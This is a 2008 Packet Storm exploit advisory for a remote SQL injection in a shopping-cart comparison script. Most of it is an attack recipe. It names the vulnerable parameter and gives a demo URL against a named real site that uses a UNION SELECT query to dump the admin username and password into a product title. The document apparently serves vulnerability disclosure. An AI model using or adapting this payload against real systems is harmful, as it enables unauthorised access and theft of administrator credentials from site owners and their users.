rakhi-sql.txt

2008-11-29T00:00:00
ID PACKETSTORM:72372
Type packetstorm
Reporter XaDoS
Modified 2008-11-29T00:00:00

Description

                                        
                                            `[■] Prince Comparison Script : Shopping card <= Rem0tE $ql Injection  
  
>@.@<  
  
> AuToR: XaDoS  
> Contact M&: xados [at] hotmail [dot] it  
> B§g: Remote Sql inJection  
> SIte vuln: http://willscript.com/rjbike_new/index.php  
  
>@.@<  
  
  
  
[■] ExPL0iT:  
  
|: http://www.example.com/product.php?category_id=1&subcategory_id=[$qL]  
  
  
  
[■] D£M0:   
  
|: http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=4 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin--  
  
(you see the username and password of adm in the title of one product)  
  
[■] Th4nKs::  
  
\> str0ke </  
\> OnlY me ( no help for this ) ;-) </  
  
`